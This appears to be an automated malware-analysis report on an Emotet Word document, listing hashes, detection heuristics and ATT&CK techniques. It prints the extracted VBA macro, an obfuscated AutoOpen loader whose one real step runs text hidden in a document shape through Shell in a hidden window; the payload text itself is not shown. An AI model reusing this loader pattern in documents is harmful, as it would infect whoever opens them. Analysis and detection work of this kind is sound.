Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 7b13baf547a06487…

MALICIOUS

Office (OLE)

75.5 KB Created: 2018-11-16 06:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: b7496c788a6bc17aee3b57eb834cbe1a SHA-1: 130a47fa20900726288c21a68dc1f31fe674ced8 SHA-256: 7b13baf547a06487858a4107f53b56161f4aac7a502e977df27223ec30cfce62
202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader and is detected by ClamAV as Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and executes a second-stage payload. The presence of legacy WordBasic auto-exec markers further supports the malicious intent.

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-6872657-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6872657-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3411 bytes
SHA-256: 0408eddbc3d4dccd167d1064591f4525e1c5563eaed92e4a098d86154ecbcc98
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "bwiOniizVBh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   GZRGPjckc = "" + otXAwAiM + OKPqC + ActiveDocument.Name + zwZjG + CQtTi
ORSUlWtfX = iMtHYi & BcTKSYC & "\" & GZRGPjckc
        If Dir(ORSUlWtfX) = "" Then
            If Dir(Replace(ORSUlWtfX, "IiINp", "ziAHWm")) <> "" Then
                ORSUlWtfX = Replace(ORSUlWtfX, "jjKCIKmQ", ".SJiwBh")
            End If
End If
   ihUvahs = "" + jrBfItO + YbGlVsRbs + ActiveDocument.Name + XjLkUFN + ZMzBAsd
sopMz = ZmvWYrOk & VCtUH & "\" & ihUvahs
        If Dir(sopMz) = "" Then
            If Dir(Replace(sopMz, "QssfHCJj", "rjXfak")) <> "" Then
                sopMz = Replace(sopMz, "PPYcRw", ".vRlUBwX")
            End If
End If
   HmcYjM = "" + ZbuVZKmqu + WKDnz + ActiveDocument.Name + nQodN + awAQJ
wNViIns = zcllkUBQR & VZbVdVq & "\" & HmcYjM
        If Dir(wNViIns) = "" Then
            If Dir(Replace(wNViIns, "rRwbobWl", "MjcFZZJ")) <> "" Then
                wNViIns = Replace(wNViIns, "nHpDtPl", ".AjYBw")
            End If
End If
   KwOvo = "" + wlKQZpwtH + wSrctDLrl + ActiveDocument.Name + zWslC + IEqfIDM
VovzXKJYw = wBAMhV & qBlRBGfbf & "\" & KwOvo
        If Dir(VovzXKJYw) = "" Then
            If Dir(Replace(VovzXKJYw, "KmnfOB", "ZVQRrLk")) <> "" Then
                VovzXKJYw = Replace(VovzXKJYw, "bzwKF", ".csZNvjrDb")
            End If
End If
MiTcPhizNwJ = "" + DzdHu + QNZahLX + Shapes("mKuUMOR").TextFrame.ContainingRange + RbMITfz + Zouzki
   SolnGO = "" + zHwLGpqdi + TwBiCJfw + ActiveDocument.Name + AHYAiX + ilJVc
zcfkwpFja = wHSIXLSHi & PoGNcD & "\" & SolnGO
        If Dir(zcfkwpFja) = "" Then
            If Dir(Replace(zcfkwpFja, "HIkSz", "tBbWQ")) <> "" Then
                zcfkwpFja = Replace(zcfkwpFja, "UlboJJfJ", ".joaHSnA")
            End If
End If
   bCZwCbS = "" + jZtdY + IGlzGN + ActiveDocument.Name + FwGHiRU + NXnjXPk
hhScujH = jVHAhYBbu & YqToDqcs & "\" & bCZwCbS
        If Dir(hhScujH) = "" Then
            If Dir(Replace(hhScujH, "VfRclziq", "qKGtJfobF")) <> "" Then
                hhScujH = Replace(hhScujH, "NbDXj", ".nWCGuAFX")
            End If
End If
Const ioQhnoLktL = vbHide
   NDJqst = "" + VbTWkYP + jZjPMXC + ActiveDocument.Name + EtwqvvDC + PcTQsXVM
TlaUKKiOs = lipcA & LdFOZlIU & "\" & NDJqst
        If Dir(TlaUKKiOs) = "" Then
            If Dir(Replace(TlaUKKiOs, "Vvjjrmf", "LzRmrl")) <> "" Then
                TlaUKKiOs = Replace(TlaUKKiOs, "VNtKL", ".ZXQiUvv")
            End If
End If
Shell@ MiTcPhizNwJ + KCqCG + BMKkjE, ioQhnoLktL
   ziaWlatf = "" + ABFHFKl + LqYZNW + ActiveDocument.Name + izfUz + SWFNGJqF
SZcbEN = LbpwHLuC & mFDtmDkjW & "\" & ziaWlatf
        If Dir(SZcbEN) = "" Then
            If Dir(Replace(SZcbEN, "GRivYa", "wHHTdFJ")) <> "" Then
                SZcbEN = Replace(SZcbEN, "YHJzY", ".JQmihfzuz")
            End If
End If
   YrOvi = "" + jZiVajPI + TYJQYpl + ActiveDocument.Name + ADFGmS + nDrHXHh
iwWps = rkDUwGj & LBuvYSw & "\" & YrOvi
        If Dir(iwWps) = "" Then
            If Dir(Replace(iwWps, "cQqPO", "aJaKAMX")) <> "" Then
                iwWps = Replace(iwWps, "QnWnlBsAb", ".HChXpHkXl")
            End If
End If
End Sub